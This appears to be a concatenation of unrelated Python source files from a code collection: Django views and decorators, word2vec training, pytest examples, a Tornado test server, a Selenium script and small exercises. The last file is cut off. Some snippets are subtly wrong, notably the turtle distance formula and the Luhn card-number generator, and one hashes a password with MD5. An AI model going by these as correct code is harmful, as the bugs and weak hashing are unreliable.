config = configparser.ConfigParser()
config.read(filename)
if 'baseurl' not in config['DEFAULT']:
print("""FATAL : No baseurl found in {0}
Open {0} and add the following lines
[DEFAULT]
Baseurl = https://your-prof-instance""".format(filename))
sys.exit()
try:
requests.get(config['DEFAULT']['BASEURL'])
except:
print("{0} does not seems to be reachable. Verify the baseurl set at {1} matches ``https://your-prof-instance``".format(config['DEFAULT']['BASEURL'], filename))
sys.exit()
return config
def set_sessid(sessid):
"""
Save this current sessid in ``$HOME/.profrc``
"""
filename = path.join(path.expanduser('~'), '.profrc')
config = configparser.ConfigParser()
config.read(filename)
config.set('DEFAULT', 'Session', sessid)
with open(filename, 'w') as configfile:
print("write a new sessid")
config.write(configfile)
|
994,976 | f101f8bd842d6d1d299a87a42f7a9a904a913a21 | # -*- coding:utf-8 -*-
# 定义多点坐标_绘出折线_并计算起始点和终点距离
import turtle
import math
# 定义多个点的坐标
x1,y1 = 100,100
x2,y2 = 100,-100
x3,y3 = -100,-100
x4,y4 = -100,100
# 绘制折线
turtle.penup()
turtle.goto(x1,y1)
turtle.pendown()
turtle.goto(x2,y2)
turtle.goto(x3,y3)
turtle.goto(x4,y4)
# 计算起始点和终点的距离
distance = math.sqrt((x1-x4)**2 * (y1-y4)**2)
turtle.write(distance)
|
994,977 | 1fe507cd8e5bd247528f902c37d2e50731d2302f | import random
for count in range(5):
id_prefix = '6245647845412' # define the card id,15 digit number
id_suffix = random.randint(10000, 99999) # random number for 16-18
bankid = id_prefix + str(id_suffix) # connect the prefix and suffix
sum = 0 # the count var
for i in range(len(bankid) - 1, 0, -2): # from last one to first one,the sum of odd position number
sum += int(bankid[i])
for j in range(len(bankid) - 2, 0, -2): # from last one to first one
if int(bankid[j]) * 2 > 10: # the even position number multiply by 2,and if more than 10,then minus 9
sum += int(bankid[j]) - 9
else:
sum += int(bankid[j])
thelast = sum % 10
if thelast > 0: # check the last number,make sum%10 is 0,if not ,plus the result of 10-sum%10
bankid = bankid + str(10 - thelast)
else:
bankid = bankid + '0'
print(bankid)
|
994,978 | 3906a490b319ba6cf3867c91af26f946d38bbab6 | from django.shortcuts import render
from django.http import HttpResponseRedirect
from django.urls import reverse
from django.contrib.auth import logout,login,authenticate
from django.contrib.auth.forms import UserCreationForm
# Create your views here.
def logout_view(request):
#注销用户
logout(request)
return HttpResponseRedirect(reverse('learning_logs:index'))
def register(request):
#注册新用户
if request.method !='POST':
#显示空的注册表单
form = UserCreationForm()
else:
#处理填写好的表单
form = UserCreationForm(data=request.POST)
if form.is_valid():
new_user = form.save()
#让用户自动登录,在重新定向主页
authenticated_user = authenticate(username=new_user.username,password = request.POST['password1'])
login(request,authenticated_user)
return HttpResponseRedirect(reverse('learning_logs:index'))
context = {'form':form}
return render(request,'users/register.html',context)
|
994,979 | f28986fea7d05b3d0184c1f955244c8b89165bce | import collections
import itertools
from copy import deepcopy
from gensim.models.word2vec import Word2Vec
from gensim.models.callbacks import CallbackAny2Vec
from ray import tune
from recsys.data import (
load_recsys15,
load_aotm,
load_ecomm,
train_test_split
)
from recsys.metrics import recall_at_k, mrr_at_k
from recsys.utils import absolute_filename
MODEL_DIR = "output/models/"
def train_w2v(train_data, params:dict, callbacks=None, model_name=None):
if model_name:
# Load a model for additional training.
model = Word2Vec.load(model_name)
else:
# train model
if callbacks:
model = Word2Vec(callbacks=callbacks, **params)
else:
model = Word2Vec(**params)
model.build_vocab(train_data)
model.train(train_data, total_examples=model.corpus_count, epochs=model.epochs, compute_loss=True)
vectors = model.wv
return vectors
def tune_w2v(config):
# load data
if config['dataset'] == 'recsys15':
sessions = load_recsys15()
elif config['dataset'] == 'aotm':
sessions = load_aotm()
elif config['dataset'] == 'ecomm':
sessions = load_ecomm()
else:
print(f"{config['dataset']} is not a valid dataset name. Please choose from recsys15, aotm or ecomm")
return
train, test, valid = train_test_split(sessions, test_size=1000)
ratk_logger = RecallAtKLogger(valid, k=config['k'], ray_tune=True)
# remove keys from config that aren't hyperparameters of word2vec
config.pop('dataset')
config.pop('k')
train_w2v(train, params=config, callbacks=[ratk_logger])
class RecallAtKLogger(CallbackAny2Vec):
'''Report Recall@K at each epoch'''
def __init__(self, validation_set, k, ray_tune=False, save_model=False):
self.epoch = 0
self.recall_scores = []
self.validation = validation_set
self.k = k
self.tune = ray_tune
self.save = save_model
def on_epoch_begin(self, model):
if not self.tune:
print(f'Epoch: {self.epoch}', end='\t')
def on_epoch_end(self, model):
# method 1: deepcopy the model and set the model copy's wv to None
mod = deepcopy(model)
mod.wv.norms = None # will cause it recalculate norms?
# Every 10 epochs, save the model
if self.epoch%10 == 0 and self.save:
# method 2: save and reload the. model
model.save(absolute_filename(f"{MODEL_DIR}w2v_{self.epoch}.model"))
#mod = Word2Vec.load(f"w2v_{self.epoch}.model")
ratk_score = recall_at_k(self.validation, mod.wv, self.k)
if self.tune:
tune.report(recall_at_k = ratk_score)
else:
self.recall_scores.append(ratk_score)
print(f' Recall@10: {ratk_score}')
self.epoch += 1
class LossLogger(CallbackAny2Vec):
'''Report training loss at each epoch'''
def __init__(self):
self.epoch = 0
self.previous_loss = 0
self.training_loss = []
def on_epoch_end(self, model):
# the loss output by Word2Vec is more akin to a cumulative loss and increases each epoch
# to get a value closer to loss per epoch, we subtract
cumulative_loss = model.get_latest_training_loss()
loss = cumulative_loss - self.previous_loss
self.previous_loss = cumulative_loss
self.training_loss.append(loss)
print(f' Loss: {loss}')
self.epoch += 1
def association_rules_baseline(train_sessions):
"""
Constructs a co-occurence matrix that counts how frequently each item
co-occurs with any other item in a given session. This matrix can
then be used to generate a list of recommendations according to the most
frequently co-occurring items for the item in question.
These recommendations must be evaluated using the "_baseline" recall/mrr functions in metrics.py
"""
comatrix = collections.defaultdict(list)
for session in train_sessions:
for (x, y) in itertools.permutations(session, 2):
comatrix[x].append(y)
return comatrix |
994,980 | 4df87e95368fbe3e8bdd3e3b70db46aecf6ef905 | """
File to keep basic view classes (for instance for ajax requests, etc.)
"""
from django.http import JsonResponse, HttpResponseBadRequest, Http404
from establishment.funnel.encoder import StreamJSONEncoder
class HTTPRenderer(object):
pass
global_renderer = HTTPRenderer()
def default_render_error_message(request, title, message):
pass
def default_single_page_app(request):
pass
global_renderer.render_error_message = default_render_error_message
global_renderer.render_single_page_app = default_single_page_app
def get_remote_ip(request):
"""
Method that can be used to get the ip (filled in by apache/nginx) from a request object
You don't normally want to use this, but rather have all requests wrapped in a middleware that fills in request.ip
You can change it to fit your needs, but only trust values your webserver fills in
Default is REMOTE_ADDR from webserver, which django makes HTTP_REMOTE_ADDR
"""
return request.META.get("HTTP_REMOTE_ADDR", request.META.get("REMOTE_ADDR", ""))
class JSONResponse(JsonResponse):
def __init__(self, data, cls=StreamJSONEncoder, **kwargs):
super().__init__(data, cls, **kwargs)
def login_required(function=None):
def _decorator(view_func):
def _wrapped_view(request, *args, **kwargs):
if not request.user.is_authenticated:
if request.is_ajax():
from establishment.errors.errors import BaseError
return BaseError.USER_NOT_AUTHENTICATED
return global_renderer.render_error_message(request, "Please login", "You need to login to continue."
"You can login from the navbar (upper right corner)")
return view_func(request, *args, **kwargs)
return _wrapped_view
if function is None:
return _decorator
else:
return _decorator(function)
def superuser_required(function=None):
def _decorator(view_func):
def _wrapped_view(request, *args, **kwargs):
if not request.user.is_superuser:
if request.is_ajax():
from establishment.errors.errors import BaseError
return BaseError.NOT_ALLOWED
raise Http404()
return view_func(request, *args, **kwargs)
return _wrapped_view
if function is None:
return _decorator
else:
return _decorator(function)
def login_required_ajax(function=None):
"""
Just make sure the user is authenticated to access a certain ajax view
"""
def _decorator(view_func):
def _wrapped_view(request, *args, **kwargs):
if not request.is_ajax():
return HttpResponseBadRequest()
if not request.user.is_authenticated:
from establishment.errors.errors import BaseError
return BaseError.USER_NOT_AUTHENTICATED
return view_func(request, *args, **kwargs)
return _wrapped_view
if function is None:
return _decorator
else:
return _decorator(function)
def ajax_required(function=None):
def _decorator(view_func):
def _wrapped_view(request, *args, **kwargs):
if not request.is_ajax():
return HttpResponseBadRequest()
return view_func(request, *args, **kwargs)
return _wrapped_view
if function is None:
return _decorator
else:
return _decorator(function)
def single_page_app(function):
def _decorator(view_func):
def _wrapped_view(request, *args, **kwargs):
if not request.is_ajax():
return global_renderer.render_single_page_app(request)
return view_func(request, *args, **kwargs)
return _wrapped_view
if function is None:
return _decorator
else:
return _decorator(function)
|
994,981 | ea6fe88f439c48f966d3b79e0c19019bc0825f21 | import math_func
import pytest
import sys # used to demonstrate the skipif decorator
# sys give us the python version
"""
Add decorator "mark" before each test to allow us run a specific group of tests
Here we have two marks: number and strings
pytest test_math_func.py -v -m number #runs only test_add and test_prod
"""
"""
The option "-x" in the command pytest means "exit first".
So, whenever first failure occurs in your test the PI test will exit from the
execution of your test
"""
"""
The option --tb=no disable the stack trace: only a few information appears when the test fails
"""
"""
The option --maxfail= Number it wait for the maximum number of failure and then it will exit
"""
"""
The option -rsx shows the reason of skip
"""
@pytest.mark.number
#@pytest.mark.skip(reason="do not run number add test") # to not run this test
#@pytest.mark.skipif(sys.version_info < (3, 3), reason="do not run number add test") #This only skip if python version is low than 3.3
def test_add():
assert math_func.add(7, 3) == 10
assert math_func.add(7) == 9
assert math_func.add(5) == 7
@pytest.mark.number
def test_prod():
assert math_func.prod(5, 5) == 25
assert math_func.prod(5) == 10
assert math_func.prod(7) == 14
# assert math_func.prod(7) == 9 # the test will fails and with the option -x the test procedure will exit
# to test -x and --maxfail
@pytest.mark.strings
def test_add_strings():
result = math_func.add('Hello', ' World')
assert result == 'Hello World'
assert type(result) is str
assert 'Heldlo' not in result
@pytest.mark.strings
def test_prod_strings():
assert math_func.prod('Hello ', 3) == 'Hello Hello Hello '
result = math_func.prod('Hello ')
assert result == 'Hello Hello '
assert type(result) is str
assert 'Hello' in result
|
994,982 | 21d1b1be811d37e9b3fedd1d8962d0a6f57567ce | import hashlib
#1-1 待加密的字符串
str='111111'
#1-2 实例化一个md5对象
md5=hashlib.md5()
#1-3 调用update方法进行加密
md5.update(str.encode('utf-8'))
#1-4 调用hexdigest方法,获取加密结果
print(md5.hexdigest())
|
994,983 | 0988400ebdcd3945ef6628200f3e1dd739d6983f | import logging
import time
import random
import tornado.ioloop
import tornado.httpserver
import tornado.httpclient
import tornado.options
import tornado.web
import redis
from tornado.options import define, options
define("port", default=8888, help="run on the given port", type=int)
logging.basicConfig(format='%(levelname)s - %(filename)s:L%(lineno)d pid=%(process)d - %(message)s')
logger = logging.getLogger('agent')
redis_cli = redis.StrictRedis()
big_random = "".join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
for i in range(1024 * 1024)])
medium_random = "".join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
for i in range(1024)])
TORNADO_SETTINGS = {'debug': True, 'autorestart': True}
class API(tornado.web.RequestHandler):
pass
class BigNetwork(API):
async def get(self):
i = 0
page = 1024 * 1024 # 1MB
while i < len(big_random):
self.write(big_random[i*page:(i+1)*page])
i += page
self.flush()
self.finish()
class MediumNetwork(API):
async def get(self):
self.write(medium_random) # 1KB
self.finish()
class Lock(API):
def get(self):
with redis_cli.lock('block'):
time.sleep(0.5) # We want this to block. That is the point.
self.write('done')
self.finish()
def get_app():
return tornado.web.Application([
(r"/resource/network/big", BigNetwork),
(r"/resource/network/medium", MediumNetwork),
(r"/resource/lock", Lock),
], **TORNADO_SETTINGS)
def main():
loop = tornado.ioloop.IOLoop.current()
tornado.options.parse_command_line()
server = tornado.httpserver.HTTPServer(get_app())
server.listen(options.port)
server.start()
logger.info("Server listening on port %s", options.port)
loop.start()
if __name__ == "__main__":
main()
|
994,984 | 629acc1cd929c14cd8abf8409cfbe3fe6a8e05b5 | from django.shortcuts import render, HttpResponse, redirect
from .models import User
from django.contrib import messages
import bcrypt
# Create your views here.
def index(request):
return HttpResponse("vuelve")
def index(request):
return render(request, "index.html")
def register(request):
print(request.POST)
validationErrors = User.objects.registrationValidator(request.POST)
print(validationErrors)
if len(validationErrors) > 0:
for key, value in validationErrors.items():
messages.error(request, value)
return redirect("/")
else:
hashedPw = bcrypt.hashpw(request.POST['pw'].encode(), bcrypt.gensalt()).decode()
newuser = User.objects.create(first_name=request.POST['fname'], last_name=request.POST['lname'],
email=request.POST['email'], password=hashedPw)
print(newuser)
request.session['loggedinid'] = newuser.id
return redirect("/success")
def success(request):
if 'loggedinid' not in request.session:
return redirect("/")
loggedinuser = User.objects.get(id=request.session['loggedinid'])
context = {
'loggedinuser': loggedinuser
}
return render(request, "success.html", context)
def logout(request):
request.session.clear()
return redirect("/")
def login(request):
print(request.POST)
validation_errors = User.objects.loginValidator(request.POST)
print(validation_errors)
if len(validation_errors) > 0:
for key, value in validation_errors.items():
messages.error(request, value)
return redirect("/")
else:
user = User.objects.filter(email=request.POST['email'])[0]
request.session['loggedinid'] = user.id
return redirect('/success')
|
994,985 | c9aae5138ea1fe970a424bad21c3955553f1e463 | import pandas as pandas
import numpy as numpy
import yfinance as yf
import datetime as dt
from pandas_datareader import data as pdr
yf.pdr_override()
stock=input("Enter a stock ticker symbol: ")
print(stock)
startyear=2019
startmonth=1
startday=1
start=dt.datetime(startyear,startmonth,startday)
now=dt.datetime.now()
df=pdr.get_data_yahoo(stock,start,now)
print(df)
ma=50
smaString="Sma_"+str(ma)
df[smaString]=df.iloc[:,4].rolling(window=ma).mean()
print(df)
df=df.iloc[ma:]
print(df)
#Access data from AdjustedClose and sma
#for i in df.index:
# print("Adjusted Close: " + str(df["Adj Close"][1]))
# print(smaString + ": " + str(df[smaString][1]))
numH=0
numC=0
for i in df.index:
if(df["Adj Close"][i]>df[smaString][i]):
print("The Close is higher")
numH+=1
else:
print("The Close is lower")
numC+=1
print(str(numH))
print(str(numC))
|
994,986 | 2774661464568e010658241946a3ba74f8e29bb6 | from project import socketio
from project import app
import os
debug = True
if os.environ.get("ENV") == "production":
debug=False
if __name__ == "__main__":
socketio.run(app, debug=debug) |
994,987 | 7c42efea22fc640841df5e6e88d7003b26e47386 | from __future__ import division
from collections import Counter
from utils import get_dset, get_test, pprint_word
def get_tagged_vocab(dset):
return set(w for sent in dset for w,m in zip(sent['ws'],sent['ii']) if m)
def get_vocab(dset):
return set(w for sent in dset for w in sent['ws'])
def get_contexts(sent, c):
ws = (['<s>']*c) + sent['ws'] + (['</s>']*c)
contexts = []
for i, w in enumerate(sent['ws']):
wi = i + c
if sent['ii'][i]:
contexts.append(' '.join([w for w in ws[wi-c:wi] + ['___'] + ws[wi+1:wi+c+1]]))
return contexts
if __name__ == '__main__':
trn = get_dset()
tst = get_test()
print map(len, map(get_tagged_vocab, [trn,tst]))
print 'tagged vocab size trn {} tst {}'.format(*map(len, map(get_tagged_vocab, [trn,tst])))
print 'all vocab size trn {} tst {}'.format(*map(len, map(get_vocab, [trn,tst])))
vtrn, vtst = map(get_tagged_vocab, [trn,tst])
print 'tagged vtst diff: {:.2f}'.format( len(vtst.difference(vtrn)) / len(vtst) )
vtrn, vtst = map(get_vocab, [trn,tst])
print 'all vtst diff: {:.2f}'.format( len(vtst.difference(vtrn)) / len(vtst) )
precnt = Counter(w[:j] for sent in trn for w, lbl in zip(sent['ws'],sent['ls']) for j in range(3,5) if lbl==1 and len(w)>j)
sufcnt = Counter(w[-j:] for sent in trn for w, lbl in zip(sent['ws'],sent['ls']) for j in range(3,5) if lbl==1 and len(w)>j)
print 'most common prefixes:', precnt.most_common(100)
print 'most common suffixes:', sufcnt.most_common(100)
trn_tagged_wcounts = Counter(w for sent in trn for w, lbl, m in zip(sent['ws'],sent['ls'],sent['ii']) if m)
print 'perc of words appers 1+ in trn:', sum(c for w,c in trn_tagged_wcounts.iteritems() if c > 1) / sum(c for w,c in trn_tagged_wcounts.iteritems())
tst_tagged_wcounts = Counter(w for sent in tst for w, lbl, m in zip(sent['ws'],sent['ls'],sent['ii']) if m)
print 'most common tst_tagged_wcounts:', tst_tagged_wcounts.most_common(100)
print 'perc of words appers 1+ in tst:', sum(c for w,c in tst_tagged_wcounts.iteritems() if c > 1) / sum(c for w,c in tst_tagged_wcounts.iteritems())
context_counts = Counter(context for sent in trn for context in get_contexts(sent, 1))
print 'most common contexts in trn:', context_counts.most_common(100)
context_counts = Counter(context for sent in tst for context in get_contexts(sent, 1))
print 'most common contexts in tst:', context_counts.most_common(100)
|
994,988 | 208fc1e8d46da72357639d180d4adeaf139231a0 | # -*- coding: utf-8 -*-
import shutil
import os
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
def donwload(arquivo):
# arq = 'C:\\caminho\\testes\\'+ arquivo
diretorio = u'{}/{}'.format(os.getcwd(),'testes')
arq = u'{}/{}'.format(diretorio,arquivo)
# driver = webdriver.Chrome()
driver = webdriver.Firefox()
driver.implicitly_wait(30)
driver.get('http://zarbi.chem.yale.edu/ligpargen/index.html')
#driver.find_element_by_id("exampleMOLFile").click()
driver.find_element_by_id("exampleMOLFile").clear()
driver.find_element_by_id("exampleMOLFile").send_keys(arq)
driver.find_element_by_xpath(
"(.//*[normalize-space(text()) and normalize-space(.)='Molecule charge'])[1]/following::button[1]"
).click()
#driver.find_element_by_xpath("//input[@type='submit' and @value='something']").click()
driver.find_element_by_xpath("//input[@type='submit' and @value='TOP']").click()
driver.implicitly_wait(50)
def inicio():
diretorio = os.getcwd()
# pasta = u'{}/{}'.format(diretorio,'molecula.pdb')
# pasta = os.listdir("C:\\caminho\\testes")
# if not os.path.exists("testes"):
# os.makedirs("testes")
pasta = os.listdir("testes")
dir_testes = u'{}/{}'.format(os.getcwd(),'testes')
arquivos = [arq for arq in pasta if os.path.isfile(os.path.join(dir_testes, arq))]
# print(arquivos)
pdb = [arq for arq in arquivos if arq.lower().endswith(".pdb")]
# print(pdb)
# print (len(pdb))
if not os.path.exists('testar'):
os.makedirs('testar')
else:
os.system('rm -Rf testar/')
os.makedirs('testar')
for b in pdb:
# donwload(b)
dir = b.split(".")[0]
os.makedirs(u'{}/{}'.format('testar',dir))
# print(os.listdir("testar"))
if not os.path.exists('Downloads'):
os.makedirs('Downloads')
else:
os.system('rm -Rf Downloads/')
os.makedirs('Downloads')
for i in range(1,5):
arquivo = u'Arquivo{}.itp'.format(i)
os.system(u'touch Downloads/{}'.format(arquivo))
a = os.listdir("Downloads")
dir_testes = u'{}/{}'.format(os.getcwd(),'Downloads')
ar = [arq for arq in a if os.path.isfile(os.path.join(dir_testes, arq))]
jpgs = [art for art in ar if art.lower().endswith(".itp")]
if not os.path.exists('Destino'):
os.makedirs('Destino')
else:
os.system('rm -Rf Destino/')
os.makedirs('Destino')
'''Coloque o caminho completo abaixo'''
origem = '/home/luxu/Área de Trabalho/Downloads/'
[shutil.move(origem+j,'Destino') for j in jpgs]
print(os.listdir("Destino"))
inicio()
|
994,989 | 1950d79935bb43abd9984ed9576551eb22f5142a | import json
import time
import redis
from Data import TemperatureLog
class Database:
instance = None
@classmethod
def getInstance(cls):
if Database.instance is None:
Database.instance = cls()
return Database.instance
def __init__(self):
self.database = redis.StrictRedis(host='localhost', port=6379, db=0)
def logTemp(self, log: TemperatureLog.TemperatureLog):
self.database.zadd('temp_log', {str(log.tempCelsius): log.timestamp})
def getLast24HoursTemps(self) -> [TemperatureLog.TemperatureLog]:
oneDayMs = 24 * 60 * 60 * 1000
upperBound = int(time.time())
lowerBound = upperBound - oneDayMs
rawData = self.database.zrange('temp_log', lowerBound, upperBound, withscores=True)
return [TemperatureLog.TemperatureLog(float(data[0]), data[1]) for data in rawData]
def setFanState(self, fansOn: bool):
self.database.set('fan_state', str(fansOn))
# whether or not the fans are running
def getFanState(self) -> bool:
return bool(self.database.get('fan_state'))
# ms between temperature checks
def getTempRefreshTime(self) -> int:
return self.database.get('temp_refresh') or 180000
def setTempRefreshTime(self, timeMs: int):
self.database.set('temp_refresh', timeMs)
def setUpperTemp(self, tempCelsius: float):
self.database.set('temp_upper', tempCelsius)
def setLowerTemp(self, tempCelsius: float):
self.database.set('temp_lower', tempCelsius)
# celsius upper threshold
def getUpperTemp(self) -> float:
return float(self.database.get('temp_upper')) or 26.0
# celsius lower threshold
def getLowerTemp(self) -> float:
return float(self.database.get('temp_lower')) or 21.0
def createItem(self, itemDict: dict):
# self.database.set(itemDict['id'], itemDict)
self.database.hset('items', itemDict['id'], json.dumps(itemDict))
def deleteItem(self, itemId: str):
self.database.hdel('items', itemId)
def listItems(self) -> [dict]:
idToDict = self.database.hgetall('items')
items = []
for itemId, itemBody in idToDict.items():
items.append(json.loads(itemBody))
return items
|
994,990 | 3252558251ef483d63cd2c24f4e9df26988428f9 | # BinarySearchTree sample code
class BST:
def __init__(self,root,left,right):
self.root = root
self.left = left
self.right = right
def __eq__(self, other):
if other == None:
return False
else:
return self.root == other.root and self.left == other.left and self.right == other.right
class BinarySearchTree:
def __init__(self,BST,comes_before):
self.BST = BST
self.comes_before = comes_before
def __eq__(self, other):
if other == None:
return False
else:
return self.BST == other.BST and self.comes_before == other.comes_before
# Returns True if empty, and false otherwise
def is_empty(inputBST):
if inputBST.BST == None:
return True
else:
return False
def insert(inputTree,value):
if inputTree == None:
raise IndexError
if inputTree.BST == None:
return BinarySearchTree(BST(value,None,None),inputTree.comes_before)
else:
if inputTree.comes_before(value,inputTree.BST.root):
if inputTree.BST.left != None:
return BinarySearchTree(BST(inputTree.BST.root, insert(BinarySearchTree(inputTree.BST.left,inputTree.comes_before), value),inputTree.BST.right),inputTree.comes_before)
else:
temp = inputTree.BST.left
inputTree.BST.left = value
inputTree.BST.root = inputTree.BST.left
inputTree.BST.root = temp
return inputTree
else:
if inputTree.BST.right != None: #has children nodes
tempBST = BST(inputTree.BST.root, inputTree.BST.right, insert(BinarySearchTree(inputTree.BST.right,inputTree.comes_before),value))
return BinarySearchTree(tempBST,inputTree.comes_before)
else: #no children nodes
inputTree.BST.right = BST(value,None,None)
return inputTree
#
# def lookup(inputTree,value):
# if inputTree == None:
# return BinarySearchTree(BST(None,None,None),comes_before=print_function)
# else:
# if inputTree.comes_before(value,inputTree.BST.root):
# return lookup(inputTree.BST.left,value)
# elif inputTree.comes_before(inputTree.BST.root,value):
# return lookup(inputTree.BST.right.value)
# else:
# return True
# def delete(inputTree,value):
# itExists = lookup(inputTree,value) #Checks to see whether the value is inside the given tree at all
# if itExists is False:
# return inputTree
# else:
# if inputTree.comes_before(value,inputTree.BST.root): #left
# return delete(inputTree)
|
994,991 | 473ea953d017dcb6b3288e4587ae7843cea28be3 | #!/usr/bin/python
#-*- coding: utf-8 -*-
class Product:
def __init__(self):
self.ID = None
self.Name = None
def Add Product(self, ):
pass
def Remove Product(self, ):
pass
|
994,992 | f44be79d296a3780ed6a0893f8f40928862a3582 | # Licensed to Modin Development Team under one or more contributor license agreements.
# See the NOTICE file distributed with this work for additional information regarding
# copyright ownership. The Modin Development Team licenses this file to you under the
# Apache License, Version 2.0 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
"""The module defines interface for a partition with pandas storage format and Python engine."""
from modin.core.dataframe.pandas.partitioning.partition import PandasDataframePartition
from modin.core.execution.python.common import PythonWrapper
class PandasOnPythonDataframePartition(PandasDataframePartition):
"""
Partition class with interface for pandas storage format and Python engine.
Class holds the data and metadata for a single partition and implements
methods of parent abstract class ``PandasDataframePartition``.
Parameters
----------
data : pandas.DataFrame
``pandas.DataFrame`` that should be wrapped with this class.
length : int, optional
Length of `data` (number of rows in the input dataframe).
width : int, optional
Width of `data` (number of columns in the input dataframe).
call_queue : list, optional
Call queue of the partition (list with entities that should be called
before partition materialization).
Notes
-----
Objects of this class are treated as immutable by partition manager
subclasses. There is no logic for updating in-place.
"""
execution_wrapper = PythonWrapper
def __init__(self, data, length=None, width=None, call_queue=None):
super().__init__()
if hasattr(data, "copy"):
data = data.copy()
self._data = data
if call_queue is None:
call_queue = []
self.call_queue = call_queue
self._length_cache = length
self._width_cache = width
def get(self):
"""
Flush the `call_queue` and return copy of the data.
Returns
-------
pandas.DataFrame
Copy of DataFrame that was wrapped by this partition.
Notes
-----
Since this object is a simple wrapper, just return the copy of data.
"""
self.drain_call_queue()
return self._data.copy() if hasattr(self._data, "copy") else self._data
def apply(self, func, *args, **kwargs):
"""
Apply a function to the object wrapped by this partition.
Parameters
----------
func : callable
Function to apply.
*args : iterable
Additional positional arguments to be passed in `func`.
**kwargs : dict
Additional keyword arguments to be passed in `func`.
Returns
-------
PandasOnPythonDataframePartition
New ``PandasOnPythonDataframePartition`` object.
"""
def call_queue_closure(data, call_queue):
"""
Apply callables from `call_queue` on copy of the `data` and return the result.
Parameters
----------
data : pandas.DataFrame or pandas.Series
Data to use for computations.
call_queue : array-like
Array with callables and it's kwargs to be applied to the `data`.
Returns
-------
pandas.DataFrame or pandas.Series
"""
result = data.copy()
for func, f_args, f_kwargs in call_queue:
try:
result = func(result, *f_args, **f_kwargs)
except Exception as err:
self.call_queue = []
raise err
return result
self._data = call_queue_closure(self._data, self.call_queue)
self.call_queue = []
return self.__constructor__(func(self._data.copy(), *args, **kwargs))
def drain_call_queue(self):
"""Execute all operations stored in the call queue on the object wrapped by this partition."""
if len(self.call_queue) == 0:
return
self.apply(lambda x: x)
def wait(self):
"""
Wait for completion of computations on the object wrapped by the partition.
Internally will be done by flushing the call queue.
"""
self.drain_call_queue()
@classmethod
def put(cls, obj):
"""
Create partition containing `obj`.
Parameters
----------
obj : pandas.DataFrame
DataFrame to be put into the new partition.
Returns
-------
PandasOnPythonDataframePartition
New ``PandasOnPythonDataframePartition`` object.
"""
return cls(obj.copy(), len(obj.index), len(obj.columns))
@classmethod
def preprocess_func(cls, func):
"""
Preprocess a function before an ``apply`` call.
Parameters
----------
func : callable
Function to preprocess.
Returns
-------
callable
An object that can be accepted by ``apply``.
Notes
-----
No special preprocessing action is required, so unmodified
`func` will be returned.
"""
return func
|
994,993 | c80d97a218a4e2b60893b333f96a1526398a47c2 | '''
Input1:
3
26 40 83
49 60 57
13 89 99
Output1:
96
'''
import sys
input_size = int(sys.stdin.readline())
accumulated = [0]*3
for i in range(input_size):
r, g, b = sys.stdin.readline().split(' ')
r = int(r)
g = int(g)
b = int(b)
r += min(accumulated[1], accumulated[2])
g += min(accumulated[0], accumulated[2])
b += min(accumulated[0], accumulated[1])
accumulated[0] = r
accumulated[1] = g
accumulated[2] = b
print(min(accumulated))
|
994,994 | 8035f3956c6a71b11b72fdd1e7029f83b55ff91f |
import math
import random
import feedback as fb
class AdPublisher( fb.Component ):
def __init__( self, scale, min_price, relative_width=0.1 ):
self.scale = scale
self.min = min_price
self.width = relative_width
def work( self, u ):
if u <= self.min: # Price below min: no impressions
return 0
# "demand" is the number of impressions served per day
# The demand is modeled (!) as Gaussian distribution with
# a mean that depends logarithmically on the price u.
mean = self.scale*math.log( u/self.min )
demand = int( random.gauss( mean, self.width*mean ) )
return max( 0, demand ) # Impression demand is greater than zero
class AdPublisherWithWeekend( AdPublisher ):
def __init__( self, weekday, weekend, min_price, relative_width=0.1 ):
AdPublisher.__init__( self, None, min_price, relative_width )
self.weekday = weekday
self.weekend = weekend
self.t = 0 # Internal day counter
def work( self, u ):
self.t += 1
if self.t%7 < 2: # Weekend
self.scale = self.weekend
else:
self.scale = self.weekday
return AdPublisher.work( self, u )
# ------------------------------------------------------------
def statictest():
fb.static_test( AdPublisher, (100,2), 20, 100, 10, 5000 )
def closedloop( kp, ki, f=fb.Identity() ):
def setpoint( t ):
if t > 1000:
return 125
return 100
k = 1.0/20.0
p = AdPublisher( 100, 2 )
c = fb.PidController( k*kp, k*ki )
fb.closed_loop( setpoint, c, p, returnfilter=f )
accumul_goal = 0
def closedloop_accumul( kp, ki ):
def setpoint( t ):
global accumul_goal
if t > 1000:
accumul_goal += 125
else:
accumul_goal += 100
return accumul_goal
k = 1.0/20.0
p = AdPublisher( 100, 2 )
c = fb.PidController( k*kp, k*ki )
fb.closed_loop( setpoint, c, p, returnfilter=fb.Integrator() )
def specialsteptest():
p = AdPublisher( 100, 2 )
f = fb.RecursiveFilter(0.05)
for t in range( 500 ):
r = 5.50
u = r
y = p.work( u )
z = f.work( y )
print( t, t*fb.DT, r, 0, u, u, y, z, p.monitoring() )
quit()
# ------------------------------------------------------------
if __name__ == '__main__':
fb.DT = 1
# statictest()
# closedloop( 0.5, 0.25 ) # default
# closedloop( 0.0, 0.25 ) # w/o prop ctrl
# closedloop( 0.0, 1.75 ) # ringing
# closedloop( 1.0, 0.125, fb.RecursiveFilter(0.125) ) #
# closedloop_accumul( 0.5, 0.125 )
|
994,995 | f62bc97442a463046a8304cd9b13f637a7e20c15 | from django.http import HttpResponse
from django.shortcuts import render
from django.core.exceptions import PermissionDenied
from django.shortcuts import redirect
from team.models import *
from django.db.models import Q
def userIsTeamLeader(function):
def wrap(request, *args, **kwargs):
team = Team.objects.get(teamName = kwargs['team'])
if team.teamLeader== request.user:
return function(request, *args, **kwargs)
else:
return render(request, 'errorconnected.html')
wrap.__doc__ = function.__doc__
wrap.__name__ = function.__name__
return wrap
def userIsDeveloper(function):
def wrap(request, *args, **kwargs):
member = TeamMember.objects.get(Q(teamName = kwargs['team'] ) & Q(userName = request.user ))
dev=Role.objects.get(role="Developer")
if member.role == dev:
return function(request, *args, **kwargs)
else:
return render(request, 'errorconnected.html')
wrap.__doc__ = function.__doc__
wrap.__name__ = function.__name__
return wrap
def userIsTester(function):
